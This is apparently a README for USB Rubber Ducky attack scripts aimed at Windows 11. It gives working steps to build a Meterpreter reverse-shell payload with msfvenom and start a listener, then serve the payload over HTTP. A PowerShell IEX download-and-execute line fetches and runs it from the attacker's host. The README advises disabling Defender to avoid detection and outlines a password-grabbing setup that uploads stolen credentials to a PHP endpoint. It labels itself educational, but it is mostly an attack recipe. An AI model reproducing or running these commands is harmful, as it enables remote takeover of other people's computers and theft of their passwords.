Can be used for pentesting or administrative tasks.
For educational puposes only!
Tested and working on WIndows 11
Steps to Compromise(StealthReverseShell.txt):
Requires Admin privileges to disable Defender. Otherwise, the payload may be detected.
Create the payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=AttacksersIP LPORT=AttackersPort -f psh -o PAYLOAD.ps1
Open msfconsole and start listener
msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost IP; set lport PORT; set ExitOnSession false; exploit -j"
Start python http server
python3 -m http.server 80
Ducky script will download and execute payload session
IEX(New-Object System.Net.WebClient).DownloadString('http://IPADDR/PAYLOAD.ps1')
Demonstration Video
Steps to Compromise(PassGrab.txt):
Requires Admin privileges to disable Defender. Otherwise, the payload may be detected.
Setup the web server.
Replace the domain name with your own.
Setup php file to accept incoming upload requests.